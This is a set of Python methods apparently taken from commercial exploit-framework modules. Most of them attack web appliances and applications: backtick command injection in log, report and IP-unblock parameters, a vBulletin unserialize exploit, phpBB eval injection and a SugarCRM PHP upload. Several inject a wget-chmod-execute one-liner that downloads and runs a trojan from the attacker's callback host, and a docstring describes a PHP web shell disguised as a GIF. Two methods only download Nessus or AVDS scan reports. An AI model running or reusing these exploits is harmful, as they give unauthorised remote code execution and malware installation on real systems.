self.magicCookie_name + "=" + self.magicCookie_val) self.setProgress(50) # To-do: Handle enable/disable separatedly # #UA.SetCookie(self.magicCookie_name,self.magicCookie_val+1) # to restore authentication flag. #self.log("Cookie: "+self.magicCookie_name+"="+self.magicCookie_val) data = UA.GET("") self.setProgress(70) if "status/status_deviceinfo" in data: self.log("Authentication successfully disabled!") self.log("You can now access web interface without password.") self.setProgress(100) ret = 1 else: if "Protected Object" in data: self.log("Exploit did not work. Wrong offsets?") ret = 0 if ret: self.setInfo("%s attacking %s:%d - done (success!)" % (NAME, self.host, self.port)) else: self.setInfo("%s attacking %s:%d - done (failed)" % (NAME, self.host, self.port)) return ret
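def run(self):
    """Run a command through the logs page ``by`` parameter.

    Steps: GET ``/`` to pick up the ``STYLE`` hidden field (used as the
    session handle), log in at ``/index.php?c=login``, POST a log search
    whose ``by`` value is ``user_timeline`<cmd> > backup/d2``` so the
    command output is written to ``/backup/d2``, then GET that file.

    With no ``cmd`` argument the method runs in TROJANMODE: ``cmd`` becomes
    a wget/chmod/exec one-liner fetching ``self.trojanname`` from
    ``self.callback.ip``, the serving HTTP thread is started and the method
    sleeps forever afterwards to keep it alive.  Otherwise the fetched
    output is logged.  Returns 1 on success, 0 when no STYLE value is
    found, the login is refused, or the output file is missing.

    Fix versus the previous revision: ``re.findall`` never returns
    ``None`` (it returns ``[]``), so the emptiness check was dead and an
    absent STYLE field raised IndexError.
    """
    self.host = self.target.interface
    self.port = int(self.argsDict.get("port", self.port))
    self.username = self.argsDict.get("username", self.username)
    self.password = self.argsDict.get("password", self.password)

    if self.argsDict.get("cmd", self.cmd) == "":
        self.TROJANMODE = 1
        self.cmd = "wget -O /tmp/" + self.trojanname + " http://" + self.callback.ip + "/" + self.trojanname + "; chmod +x /tmp/" + self.trojanname + "; /tmp/" + self.trojanname
        thread.start_new_thread(self.startHTTPServer, ())
    else:
        self.cmd = self.argsDict.get("cmd", self.cmd)

    self.setInfo("%s attacking %s:%d (in progress)" % (NAME, self.host, self.port))
    self.log("Attacking %s:%d" % (self.host, self.port))

    ua = spkproxy.UserAgent("", exploit=self)

    def absolute(path):
        return "%s://%s:%d%s" % (self.protocol, self.host, self.port, path)

    # Session handle: the last STYLE hidden field on the landing page.
    data = ua.GET(absolute("/"))
    styles = re.findall('name="STYLE" value="([^"]+)" ', data)
    if not styles:
        self.log('[D2SEC] Unable to get a valid session id')
        return 0
    style = styles[-1]
    self.log("STYLE=%s" % style)

    # Authentication
    params = urllib.urlencode({
        'STYLE': style,
        'destination': '',
        'section': '',
        'username': self.username,
        'password': self.password
    })
    data = ua.POST(absolute("/index.php?c=login"), params)
    if "Invalid username" in data:
        self.log('[D2SEC] Authentication error')
        return 0

    # Exploitation: backticks in `by` are evaluated by the shell.
    self.cmd = 'user_timeline`%s > backup/d2`' % self.cmd
    params = urllib.urlencode({
        'STYLE': style,
        'period': 'today',
        'xperiod': '',
        'sb_xperiod': 'xdays',
        'startDate': '',
        'txt_time_start': '12:00 AM',
        'endDate': '',
        'txt_time_end': '11:59 PM',
        'txt_filter_user_timeline': '',
        'action': 'search',
        'by': self.cmd,
        'search': '',
        'sort': 'time',
        'multiplier': '1',
        'start': '',
        'end': '',
        'direction': '1',
        '_': ''
    })
    ua.POST(absolute("/index.php?c=logs"), params)

    data = ua.GET(absolute("/backup/d2"))
    if '404 - File not found' in data:
        self.log('[D2SEC] No valid session id found')
        return 0

    if self.TROJANMODE == 1:
        # Keep the trojan-serving thread alive.
        while 1:
            time.sleep(1)
    else:
        self.log('[D2SEC] %s' % data)
    return 1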
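def run(self):
    """Run a command through the ``unblockip`` parameter of the reports UI.

    Steps: GET ``/`` to pick up the ``STYLE`` hidden field (used as the
    session handle), log in at ``/index.php?c=login``, then GET
    ``users_monitored_search_queries`` with
    ``unblockip=1.1.1.1_1.1.1.2`<cmd> > backup/d2``` so the command output
    is written to ``/backup/d2``, and fetch that file.

    With no ``cmd`` argument the method runs in TROJANMODE: ``cmd`` becomes
    a wget/chmod/exec one-liner fetching ``self.trojanname`` from
    ``self.callback.ip``, the serving HTTP thread is started and the method
    sleeps forever afterwards to keep it alive.  Otherwise the fetched
    output is logged.  Returns 1 on success, 0 when no STYLE value is
    found, the login is refused, or the output file is missing.

    Fixes versus the previous revision: ``re.findall`` never returns
    ``None`` so the emptiness check was dead (IndexError on an absent
    STYLE field), and the request path contained a mis-encoded ``§ion``
    where ``&section`` was intended.
    """
    self.host = self.target.interface
    self.port = int(self.argsDict.get("port", self.port))
    self.username = self.argsDict.get("username", self.username)
    self.password = self.argsDict.get("password", self.password)

    if self.argsDict.get("cmd", self.cmd) == "":
        self.TROJANMODE = 1
        self.cmd = "wget -O /tmp/" + self.trojanname + " http://" + self.callback.ip + "/" + self.trojanname + "; chmod +x /tmp/" + self.trojanname + "; /tmp/" + self.trojanname
        thread.start_new_thread(self.startHTTPServer, ())
    else:
        self.cmd = self.argsDict.get("cmd", self.cmd)

    self.setInfo("%s attacking %s:%d (in progress)" % (NAME, self.host, self.port))
    self.log("Attacking %s:%d" % (self.host, self.port))

    ua = spkproxy.UserAgent("", exploit=self)
    ua.addHeader(
        "User-Agent",
        "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
    )

    def absolute(path):
        return "%s://%s:%d%s" % (self.protocol, self.host, self.port, path)

    # Session handle: the last STYLE hidden field on the landing page.
    data = ua.GET(absolute("/"))
    styles = re.findall('name="STYLE" value="([^"]+)" ', data)
    if not styles:
        self.log('[D2SEC] Unable to get a valid session id')
        return 0
    style = styles[-1]

    # Authentication
    params = urllib.urlencode({
        'STYLE': style,
        'destination': '',
        'section': '',
        'username': self.username,
        'password': self.password
    })
    data = ua.POST(absolute("/index.php?c=login"), params)
    if "Invalid username" in data:
        self.log('[D2SEC] Authentication error')
        return 0

    # Exploitation: backticks in unblockip are evaluated by the shell.
    self.cmd = '1.1.1.1_1.1.1.2`%s > backup/d2`' % self.cmd
    url = "/index.php?c=users_monitored_search_queries&section=reports&STYLE=%s&unblockip=%s" % (
        style, urllib.quote(self.cmd))
    ua.GET(absolute(url))

    data = ua.GET(absolute("/backup/d2"))
    if '404 - File not found' in data:
        self.log('[D2SEC] No valid session id found')
        return 0

    if self.TROJANMODE == 1:
        # Keep the trojan-serving thread alive.
        while 1:
            time.sleep(1)
    else:
        self.log('[D2SEC] %s' % data)
    return 1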
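def run(self):
    """Exploit the vBulletin ``arguments`` unserialize sink and call back.

    Steps: optionally locate the base path via ``self.test()``; build the
    UserAgent (basic auth, optional Content-Type, random User-Agent);
    GET ``self.targetpath`` with ``self.geturlarguments()`` (when
    ``self.command`` is set the response is parsed by
    ``parse_command_response``); GET ``z.php?c=<base64 PHP MOSDEF>`` to
    trigger the callback and poll ``self.ISucceeded()`` for up to five
    seconds; finally send a second serialised ``vB_dB_Result`` object whose
    ``free_result`` hook is ``assert`` so that ``unlink('./z.php')`` runs
    and the dropped file is removed.  Returns the poll result.

    Change versus the previous revision: the unused ``blah``/``data``
    locals are dropped, ``noresponse`` is derived directly from
    ``self.command``, and ``ret`` is initialised before the poll loop.
    """
    self.getargs()
    self.setInfo("%s attacking %s:%d (in progress)" % (self.name, self.host, self.port))
    self.log("Using version: %s" % self.version)

    # Without a basepath argument, let test() probe self.basepaths.
    if not self.basepath:
        if not self.test():
            self.setInfo("%s against %s:%d (failed: didn't find vulnerable target!)" % (self.name, self.host, self.port))
            self.log("Testing didn't find vulnerable target")
            return 0
    if not self.hostname:
        self.hostname = self.host
    self.log("Attacking %s:%d" % (self.host, self.port))
    self.log("Basic Auth User: %s" % self.basicauth_user)
    self.log("VHost: %s" % self.hostname)

    protocol = "https" if self.ssl else "http"
    # Basic-auth object from spkproxy only when a user was supplied.
    auth = None
    if self.basicauth_user:
        auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password)
    targetstring = protocol + "://" + self.hostname + ":" + str(self.port) + self.basepath
    self.ua = spkproxy.UserAgent(targetstring, auth=auth, hostname=self.hostname,
                                 exploit=self)
    if hasattr(self, "content_type"):
        self.ua.addHeader("Content-Type", self.content_type)
    # NOTE: test() may need to change if it depends on these headers.
    self.ua.addHeader("User-Agent", self.random_ua())

    # We only read the response when a command's output is expected.
    noresponse = not self.command
    data = self.ua.GET(self.targetpath + "?" + self.geturlarguments(),
                       noresponse=noresponse)
    if self.command and data:
        self.parse_command_response(data)
    sleep(1)

    # Trigger the PHP callback through the dropped z.php.
    cback = b64encode(self.get_php_to_mosdef()).strip()
    self.ua.GET("z.php?c=%s" % cback, noresponse=noresponse)

    ret = 0
    for _ in range(0, 5):  # wait up to five seconds for the callback
        ret = self.ISucceeded()
        if ret:
            break
        sleep(1)

    # Cleanup: same unserialize sink, this time with free_result => assert
    # so the recordset string is evaluated as PHP.  The %00 inserted around
    # '*' turn the property names into PHP "protected" names (\0*\0db,
    # \0*\0recordset); the s:5/s:12 lengths already account for them.
    logging.warning("Performing cleanup")
    command = """unlink('./z.php');"""
    serialized_arg = """arguments=O:12:"vB_dB_Result":2:{s:5:"*db";O:17:"vB_Database_MySQL":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"assert";}}s:12:"*recordset";s:%d:"%s";}""" % (len(command), command)
    arg = quote(serialized_arg, safe="=").replace("%2A", "%00%2A%00")
    self.ua.GET(self.targetpath + "?" + arg)
    logging.warning("Cleanup DONE")

    self.setInfo("%s attacking %s:%d (DONE)" % (self.name, self.host, self.port))
    self.setProgress(100)
    return ret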
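def run(self):
    """Run a command through the ``token`` parameter of the traffic report.

    Steps: GET ``/`` to pick up the ``STYLE`` hidden field (used as the
    session handle), log in at ``/index.php?c=login``, POST a ``traf_users``
    report request whose ``token`` is ``0.3156784180233425`<cmd> > backup/d2```
    so the command output is written to ``/backup/d2``, then GET that file.

    With no ``cmd`` argument the method runs in TROJANMODE: ``cmd`` becomes
    a wget/chmod/exec one-liner fetching ``self.trojanname`` from
    ``self.callback.ip``, the serving HTTP thread is started and the method
    sleeps forever afterwards to keep it alive.  Otherwise the fetched
    output is logged.  Returns 1 on success, 0 when no STYLE value is
    found, the login is refused, or the output file is missing.

    Fix versus the previous revision: ``re.findall`` never returns
    ``None`` (it returns ``[]``), so the emptiness check was dead and an
    absent STYLE field raised IndexError.
    """
    self.host = self.target.interface
    self.port = int(self.argsDict.get("port", self.port))
    self.username = self.argsDict.get("username", self.username)
    self.password = self.argsDict.get("password", self.password)

    if self.argsDict.get("cmd", self.cmd) == "":
        self.TROJANMODE = 1
        self.cmd = "wget -O /tmp/" + self.trojanname + " http://" + self.callback.ip + "/" + self.trojanname + "; chmod +x /tmp/" + self.trojanname + "; /tmp/" + self.trojanname
        thread.start_new_thread(self.startHTTPServer, ())
    else:
        self.cmd = self.argsDict.get("cmd", self.cmd)

    self.setInfo("%s attacking %s:%d (in progress)" % (NAME, self.host, self.port))
    self.log("Attacking %s:%d" % (self.host, self.port))

    ua = spkproxy.UserAgent("", exploit=self)
    ua.addHeader(
        "User-Agent",
        "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
    )

    def absolute(path):
        return "%s://%s:%d%s" % (self.protocol, self.host, self.port, path)

    # Session handle: the last STYLE hidden field on the landing page.
    data = ua.GET(absolute("/"))
    styles = re.findall('name="STYLE" value="([^"]+)" ', data)
    if not styles:
        self.log('[D2SEC] Unable to get a valid session id')
        return 0
    style = styles[-1]

    # Authentication
    params = urllib.urlencode({
        'STYLE': style,
        'destination': '',
        'section': '',
        'username': self.username,
        'password': self.password
    })
    data = ua.POST(absolute("/index.php?c=login"), params)
    if "Invalid username" in data:
        self.log('[D2SEC] Authentication error')
        return 0

    # Exploitation: backticks in `token` are evaluated by the shell.
    self.cmd = '0.3156784180233425`%s > backup/d2`' % self.cmd
    params = urllib.urlencode({
        'STYLE': style,
        'chart': 'pie',
        'period': 'custom',
        'multiplier': '1',
        'metric': '',
        'token': self.cmd,
        'start': '07/28/2017',
        'end': '07/28/2017',
        'filters': '{"topn": "25", "department": "sophos_swa_all_departments"}',
        'pdf': '1'
    })
    ua.POST(absolute("/index.php?c=report&name=traf_users"), params)

    data = ua.GET(absolute("/backup/d2"))
    if '404 - File not found' in data:
        self.log('[D2SEC] No valid session id found')
        return 0

    if self.TROJANMODE == 1:
        # Keep the trojan-serving thread alive.
        while 1:
            time.sleep(1)
    else:
        self.log('[D2SEC] %s' % data)
    return 1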
def run(self): self.getargs() self.setInfo("%s attacking %s:%d (in progress)" % (NAME, self.host, self.port)) if self.version == 0: ret = self.test() if not ret: self.log("Testing didn't find vulnerable target") return 0 self.log("Attacking %s:%d" % (self.host, self.port)) self.log("Basic Auth User: %s" % self.basicauth_user) self.log("VHost: %s" % self.hostname) if self.ssl: protocol = "https" else: protocol = "http" #If we have to do basic-auth, let's get an object from spkproxy here if self.basicauth_user: auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password) else: auth = None UA = spkproxy.UserAgent(protocol + "://" + self.host + ":%s" % self.port + "/" + self.basepath, auth=auth, hostname=self.hostname, exploit=self) if self.command: self.log("Command: %s" % self.command) command = self.command command = "print '---1243---\n';passthru(\'" + command + "');print '---3421---\n'; ".strip( ) data = UA.GET( "viewtopic.php?c=%s&t=1&highlight=%%2527.eval($_GET[c]).%%2527" % (urllib.quote_plus(command))) if "---1243---" in data: result = data.split("1243---")[1].split("---3421")[0] self.log("Command data: %s" % prettyprint(data)) self.log("Command result=%s" % prettyprint(result)) ret = 1 else: self.log("Command not run - service patched?!") else: command = self.get_php_to_mosdef().strip() command = command.replace("/", "`pwd|cut -b1`") self.log("Command: %s" % command) data = UA.GET( "viewtopic.php?c=%s&t=1&highlight=%%2527.eval($_GET[c]).%%2527" % (urllib.quote_plus(command))) self.log("Looking for PHP connectback") ret = self.ISucceeded() if ret: self.setInfo("%s attacking %s:%d - done (success!)" % (NAME, self.host, self.port)) else: self.setInfo("%s attacking %s:%d - done (failed)" % (NAME, self.host, self.port)) return ret
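def download(self, widget):
    """Let the user pick Nessus scans and download each as a ``.nessus`` file.

    Opens the ``exploit_dialog`` from ``simple2.glade`` with a
    Name/Date/Reference tree (multi-select).  On OK, for every selected
    Reference: request an export (``self.exporturl``), poll
    ``self.statusurl`` up to 20 times (1 s apart) until ``status`` is
    ``ready``, download ``self.reporturl`` and write it under
    ``<exploitpath>/reports/<ref with '/' replaced by '_'>``; the path is
    appended to ``self.ReportFiles`` and ``self.treestore_2``.  The API
    token is sent in the ``X-Cookie`` header.  The dialog is destroyed on
    exit regardless of the outcome.

    :param widget: the GTK widget that triggered the action (unused).

    Changes versus the previous revision: report files are written with a
    context manager, non-JSON API replies are logged and skipped instead of
    raising, the ``iter`` builtin is no longer shadowed, and the icon
    loading only swallows ``Exception``.
    """
    self.SelectedScan = []
    column_names = ['Name', 'Date', 'Reference']
    gladefile = self.exploitpath + "simple2.glade"
    self.wTree2 = gtk.glade.XML(gladefile)
    handlers = {
        "on_start_clicked": self.start,
        "on_delreport_toggled": self.activatedel,
        "on_deselectall_clicked": self.deselectall,
        "on_selectall_clicked": self.selectall
    }
    self.wTree2.signal_autoconnect(handlers)
    self.loaddlg = self.wTree2.get_widget("exploit_dialog")
    try:
        self.loaddlg.set_icon_from_file(self.exploitpath + "d2.ico")
    except Exception:
        pass  # the icon is cosmetic; a missing file must not abort

    # Reports tree: one sortable, resizable text column per name.
    self.treeview_3 = self.wTree2.get_widget("mytree")
    self.treestore_3 = gtk.TreeStore(str, str, str)
    self.treeview_3.set_show_expanders(False)
    self.treeview_3.set_model(self.treestore_3)
    self.treeselection = self.treeview_3.get_selection()
    self.treeselection.set_mode(gtk.SELECTION_MULTIPLE)
    for idx, title in enumerate(column_names):
        col = gtk.TreeViewColumn(title, gtk.CellRendererText(), text=idx)
        col.set_resizable(True)
        col.set_sort_column_id(idx)
        self.treeview_3.append_column(col)

    def parse_json(body):
        """Decode an API reply; None when it is not JSON (e.g. an error page)."""
        try:
            return json.loads(body)
        except ValueError:
            self.log("[D2 LOG] Unexpected non-JSON response")
            return None

    result = self.loaddlg.run()
    if result == gtk.RESPONSE_OK:
        if self.treeselection.count_selected_rows() > 0:
            model, paths = self.treeselection.get_selected_rows()
            for path in paths:
                row = self.treestore_3.get_iter(path)
                self.SelectedScan.append(model.get_value(row, 2))

            mainurl = "https://" + self.qhost + ":" + self.port
            headers = [("Content-Type", "application/json")]
            UA = spkproxy.UserAgent(mainurl, exploit=self)
            # Session token goes in a header, not in the URL, so it does
            # not end up in proxy/server access logs.
            UA.addHeader("X-Cookie", "token=%s" % self.token)
            reports_dir = self.exploitpath + "reports/"

            for ref in self.SelectedScan:
                self.log("[D2 LOG] Nessus get file information for %s" % ref)
                postdata = {'format': 'nessus'}
                data = UA.POST(self.exporturl % ref, data=json.dumps(postdata),
                               extraheaders=headers)
                response = parse_json(data)
                if not response or "file" not in response:
                    self.log("[D2 LOG] No file available")
                    continue
                file_id = response["file"]

                self.log("[D2 LOG] Nessus get status file %s" % file_id)
                ready = False
                for _ in range(0, 20):
                    response = parse_json(UA.GET(self.statusurl % (ref, file_id)))
                    if not response or "status" not in response:
                        self.log("[D2 LOG] Status not found")
                        break
                    if response["status"] == "ready":
                        ready = True
                        break
                    time.sleep(1)
                if not ready:
                    continue

                self.log("[D2 LOG] Nessus download file %s" % file_id)
                data = UA.GET(self.reporturl % (ref, file_id))
                if not os.path.exists(reports_dir):
                    os.mkdir(reports_dir)
                # ref comes from the server; keep it from escaping reports_dir.
                filename = reports_dir + ref.replace("/", "_")
                with open(filename, "w") as fh:
                    fh.write(data)
                self.ReportFiles.append(filename)
                self.treestore_2.append(None, [filename])
        else:
            self.log("[D2 LOG] - No Nessus report selected")
    self.loaddlg.destroy()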
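def run(self):
    """Upload a PHP file through SugarCRM's e-mail compose attachment and run it.

    Steps: log in (``self.loginpage``), set a timezone (``self.timezonepage``,
    required before the user id becomes visible), read our
    ``assigned_user_id`` from ``self.composemailpage``, upload
    ``self.getfile()`` as a multipart attachment, derive the remote file
    name from the JSON reply (``{"guid":"...","name":".php",...}`` -> the
    guid plus ``.php``), request
    ``<pathtoourfile>//<userid>//<guid>.php`` to execute it and poll
    ``self.ISucceeded()`` for up to three seconds.  Returns the poll
    result, or 0 when the user id or the remote file name cannot be
    determined.

    Changes versus the previous revision: username/password are
    form-encoded (an ``&`` or ``%`` in a password used to corrupt the
    body), the bare ``except:`` clauses are narrowed to the parsing
    errors they guard, and the unused ``test`` local is dropped.
    """
    import urllib  # local import: only needed for quote_plus here

    self.getargs()
    # NOTE(review): the probe result is not used to gate the attack; the
    # previous revision ignored it too -- confirm whether it should abort.
    self.test()
    self.setInfo("%s attacking %s:%d (in progress)" % (NAME, self.hostname, self.port))
    self.log("Attacking %s:%d" % (self.hostname, self.port))
    self.log("VHost: %s" % self.hostname)

    protocol = "https" if self.ssl else "http"
    # Basic-auth object from spkproxy only when a user was supplied.
    auth = None
    if self.basicauth_user != "":
        auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password)
    useragentstring = protocol + "://" + self.host + ":%s" % self.port + "/" + self.basepath
    self.log("useragentstring: %s" % useragentstring)
    UA = spkproxy.UserAgent(useragentstring, auth=auth, hostname=self.hostname,
                            exploit=self)

    # Login.  Credentials are form-encoded so reserved characters survive.
    UA.POST(
        self.loginpage,
        "module=Users&action=Authenticate&return_module=Users&return_action=Login&cant_login=&login_module=&login_action=&login_record=&user_name=%s&user_password=%s&login_theme=Sugar&login_language=en_us&Login=++Login++"
        % (urllib.quote_plus(self.username), urllib.quote_plus(self.password)),
        noresponse=False)

    # A user without a timezone is bounced to SetTimezone and we could not
    # read the user id; setting one unconditionally is harmless.
    UA.POST(
        self.timezonepage,
        "record=&module=Users&action=SaveTimezone&SaveTimezone=true&timezone=America%2FNew_York&button=++Save++"
    )

    # Our user id appears in links such as
    # index.php?module=Emails&action=ListView&assigned_user_id=<uuid>&type=archived
    response = UA.GET(self.composemailpage)
    try:
        userid = response.split("assigned_user_id=")[1].split("&")[0]
    except (IndexError, AttributeError):
        self.log(
            "Couldn't determine our assigned_user_id - make sure we are connecting to the correct SugarCRM host!"
        )
        return 0
    self.log("Assigned User-Id: %s" % userid)

    # Upload.  The boundary must match the one used inside self.getfile().
    UA.addHeader(
        "Content-Type",
        "multipart/form-data; boundary=---------------------------3922242971797626524322043819"
    )
    response = UA.POST(self.composemailpage, self.getfile())
    # {"guid":"c7e4746b-bba6-6dfd-7a2b-4a3977a03f0d","name":".php","nameForDisplay":".php"}
    try:
        prefix = response.split(",")[0].split(":")[1].strip("\"")
    except (IndexError, AttributeError):
        self.log(
            "Couldn't determine our remote filename - make sure we are connecting to the correct SugarCRM host!"
        )
        return 0
    ourphpfilename = prefix + ".php"
    self.log("our remote filename: %s" % ourphpfilename)

    ourfile = self.pathtoourfile + "//" + userid + "//" + ourphpfilename
    self.log("Path to our file: %s" % ourfile)

    # Execute the uploaded file; drop the multipart header first.
    UA.clearHeaders()
    UA.GET(ourfile, noresponse=True)

    ret = 0
    for _ in xrange(0, 3):  # wait up to three seconds for the callback
        time.sleep(1)
        ret = self.ISucceeded()
        if ret:
            break

    if ret:
        self.setInfo("%s attacking %s:%d - done (success!)" % (NAME, self.host, self.port))
    else:
        self.setInfo("%s attacking %s:%d - done (failed)" % (NAME, self.host, self.port))
    return ret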
def run(self): # Check arguments self.host = self.target.interface self.port = int(self.argsDict.get("port", self.port)) if (self.argsDict.get("cmd", self.cmd) == ""): self.TROJANMODE = 1 self.cmd = "wget -O /tmp/" + self.trojanname + " http://" + self.callback.ip + "/" + self.trojanname + "; chmod +x /tmp/" + self.trojanname + "; /tmp/" + self.trojanname thread.start_new_thread(self.startHTTPServer, ()) else: self.cmd = self.argsDict.get("cmd", self.cmd) self.setInfo("%s attacking %s:%d (in progress)" % (NAME, self.host, self.port)) self.log("Attacking %s:%d" % (self.host, self.port)) s = self.gettcpsock() try: s.connect((self.host, self.port)) except: self.log('Could not connect to port %s:%s' % (self.host, self.port)) ua = spkproxy.UserAgent("", exploit=self) self.cmd = '%s > ../backup/d2' % self.cmd self.cmd = base64.b64encode( 'sudo /opt/cma/bin/clear_keys.pl fakeclientfqdn ";%s;" /fakedir' % self.cmd) params = urllib.urlencode({ 'url': 'aHR0cDovL3d3dy5kMnNlYy5jb20=', 'args_reason': 'unknown', 'filetype': 'unknown', 'user_encoded': 'ZDI=', 'domain': 'http://www.d2sec.com;eval `printf %s | base64 -d`' % self.cmd, 'raw_category_id': '1|2|3|4', 'user': '******' }) url = "/end-user/index.php?c=blocked&action=continue" mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url) data = ua.POST(mainurl, params) url = "/backup/d2" mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url) data = ua.GET(mainurl) if (self.TROJANMODE == 1): while 1: time.sleep(1) else: self.log('[D2SEC] %s' % data) return 1
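def download(self, widget):
    """Open the report picker and fetch the chosen AVDS reports to disk.

    Builds the ``exploit_dialog`` from ``simple2.glade``, shows a multi-select
    tree of reports (ID / Name / Date) and, on OK, pulls each selected scan's
    XML report from the AVDS JSON API (``getreport``), base64-decodes and
    zlib-decompresses it and writes it to ``<exploitpath>/reports/<ref>``.
    Each saved path is appended to ``self.ReportFiles`` and to the
    ``self.treestore_2`` model.

    Args:
        widget: the GTK widget that fired the handler (unused).

    Returns:
        None.  An API-level error or an unparseable reply skips that scan; a
        reply without ``compresseddata`` stops the loop.  The dialog is
        destroyed on every path.
    """
    self.SelectedScan = []
    column_names = ['ID', 'Name', 'Date']
    gladefile = self.exploitpath + "simple2.glade"
    self.wTree2 = gtk.glade.XML(gladefile)
    dic = {
        "on_start_clicked": self.start,
        "on_delreport_toggled": self.activatedel,
        "on_deselectall_clicked": self.deselectall,
        "on_selectall_clicked": self.selectall
    }
    self.wTree2.signal_autoconnect(dic)
    self.loaddlg = self.wTree2.get_widget("exploit_dialog")
    try:
        self.loaddlg.set_icon_from_file(self.exploitpath + "d2.ico")
    except Exception:
        pass  # the icon is cosmetic; a missing file must not kill the dialog

    # Init reports treeview
    self.treeview_3 = self.wTree2.get_widget("mytree")
    self.treestore_3 = gtk.TreeStore(str, str, str)
    self.treeview_3.set_show_expanders(False)
    self.treeview_3.set_model(self.treestore_3)
    self.treeselection = self.treeview_3.get_selection()
    self.treeselection.set_mode(gtk.SELECTION_MULTIPLE)
    for idx, title in enumerate(column_names):
        column = gtk.TreeViewColumn(title, gtk.CellRendererText(), text=idx)
        column.set_resizable(True)
        column.set_sort_column_id(idx)
        self.treeview_3.append_column(column)

    # Start downloader dialog
    result = self.loaddlg.run()
    if (result == gtk.RESPONSE_OK):
        if (self.treeselection.count_selected_rows() > 0):
            model, paths = self.treeselection.get_selected_rows()
            for p in paths:
                row = self.treestore_3.get_iter(p)
                self.SelectedScan.append(model.get_value(row, 0))
            for ref in self.SelectedScan:
                # ref is the scan ID taken from the picker's model (presumably
                # filled from the server's scan list elsewhere).  It becomes a
                # file name below, so refuse anything that is not a bare name:
                # a hostile ID such as "../x" must not escape reports/.
                if not ref or ref in (".", "..") or "/" in ref or "\\" in ref:
                    self.log("[D2 LOG] ERROR: refusing unsafe report id %r" % (ref,))
                    continue
                mainurl = "https://" + self.qhost
                UA = spkproxy.UserAgent(mainurl, exploit=self)
                # NOTE(review): the API key rides in the query string and will
                # show up in proxy/server logs and captures.
                data = UA.GET(
                    self.jsonurl +
                    "primary=vulnerabilities&secondary=report&action=getreport&format=xml&network=%s&apikey=%s"
                    % (ref, self.apikey))
                try:
                    response = json.loads(data)
                except ValueError:
                    self.log("[D2 LOG] ERROR: unparseable AVDS response for %s" % ref)
                    continue
                if "error" in response:
                    error = response['error']
                    self.log(
                        "[D2 LOG] AVDS ERROR [%s %s %s]" % (error['type'], error['param'], error['message']))
                    continue
                if not "compresseddata" in response:
                    # break (not return) so the dialog below is still destroyed
                    self.log("[D2 LOG] ERROR: No scan available")
                    break
                xml = zlib.decompress(base64.b64decode(response['compresseddata']))
                reports_dir = self.exploitpath + "reports/"
                if not os.path.exists(reports_dir):
                    os.mkdir(reports_dir)
                filename = reports_dir + ref
                with open(filename, "w") as f:
                    f.write(xml)
                self.ReportFiles.append(filename)
                self.treestore_2.append(None, [filename])
        else:
            self.log("[D2 LOG] - No AVDS report selected")
    self.loaddlg.destroy()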
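def run(self):
    """Drive a generic web exploit: optional version probe, then one request.

    ``self.getargs()`` fills in the target settings.  When ``self.version`` is
    0 the target is probed with ``self.test()`` first and the run aborts if
    that fails.  A ``spkproxy.UserAgent`` is built for
    ``protocol://hostname:port`` + ``basepath`` (with basic auth when
    ``basicauth_user`` is set), an RFI listener is started when
    ``webserverport`` is non-zero, and a single request is sent with
    ``self.verb``: a POST with the body from ``getbody()``, or a GET with the
    query from ``geturlarguments()``.  The response is only waited for when
    ``self.command`` is set.

    Returns:
        The result of ``self.server.accept()`` (the RFI callback) when a web
        server was set up, else ``self.ISucceeded()``; 0 when the version
        probe fails.
    """
    self.getargs()
    self.setInfo("%s attacking %s:%d (in progress)" % (self.name, self.host, self.port))
    self.log("Using version: %s" % self.version)
    if self.version == 0:
        if not self.test():
            self.setInfo(
                "%s against %s:%d (failed: didn't find vulnerable target!)" % (self.name, self.host, self.port))
            self.log("Testing didn't find vulnerable target")
            return 0
    if not self.hostname:
        self.hostname = self.host
    self.log("Attacking %s:%d" % (self.host, self.port))
    self.log("Basic Auth User: %s" % self.basicauth_user)
    self.log("VHost: %s" % self.hostname)

    # setup our UA first
    if self.ssl:
        protocol = "https"
    else:
        protocol = "http"
    # If we have to do basic-auth, let's get an object from spkproxy here
    if self.basicauth_user:
        auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password)
    else:
        auth = None
    targetstring = protocol + "://" + self.hostname + ":" + str(self.port) + self.basepath
    self.log("Targetstring: %s" % targetstring)
    self.ua = spkproxy.UserAgent(targetstring, auth=auth, hostname=self.hostname, exploit=self)
    if hasattr(self, "content_type"):
        self.ua.addHeader("Content-Type", self.content_type)
    if self.webserverport:
        self.set_up_webserver()

    # Only wait for the HTTP response when a command was sent and its output
    # has to be parsed; otherwise fire and forget.
    noresponse = not self.command
    data = None  # stays None for an unknown verb instead of raising NameError
    if self.verb == "POST":
        body = self.getbody()
        self.log("POSTING data of length %s" % len(body))
        data = self.ua.POST(self.targetpath, body, noresponse=noresponse)
    elif self.verb == "GET":
        data = self.ua.GET(self.targetpath + "?" + self.geturlarguments(), noresponse=noresponse)
    if self.command and data:
        # Called for its side effects; the original discarded the value too.
        self.parse_command_response(data)

    if self.webserverport:
        # let's accept a connection if this is an RFI exploit
        # we should have timed out on the top connection
        ret = self.server.accept()
        if ret:
            self.log("Found callback to our web server: %s!" % ret)
    else:
        self.log("Recved result of: %s" % data)
        ret = self.ISucceeded()
    return ret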
def __init__(self):
    """Set up shared state for a PHP include-style exploit (RFI/log include).

    Initialises the canvasexploit base, a placeholder ``spkproxy.UserAgent``
    and three payload tables:

    * ``self.shell`` -- a byte string starting with the GIF89a signature
      (0x47 0x49 0x46 0x38 0x39 0x61) and ending with the 0x3b GIF trailer,
      with a PHP web shell embedded in the middle.  The PHP runs
      ``passthru(base64_decode($_REQUEST[SERVER_INFO]))`` and
      ``eval(base64_decode($_REQUEST[SERVER_INFO2]))`` between ``startz`` /
      ``endz`` markers -- presumably so the bytes pass as an image while a
      server that includes the file as PHP executes them.
    * ``self.log_paths`` -- relative ``../`` traversal candidates for common
      Apache access/error log locations.
    * ``self.useragents`` -- a list of browser User-Agent strings.

    How the tables are consumed is not visible here (see the class's other
    methods).  ``self.webserverport`` non-zero turns on RFI mode per the
    original comment.
    """
    canvasexploit.__init__(self)
    self.ua=spkproxy.UserAgent("") #placeholder
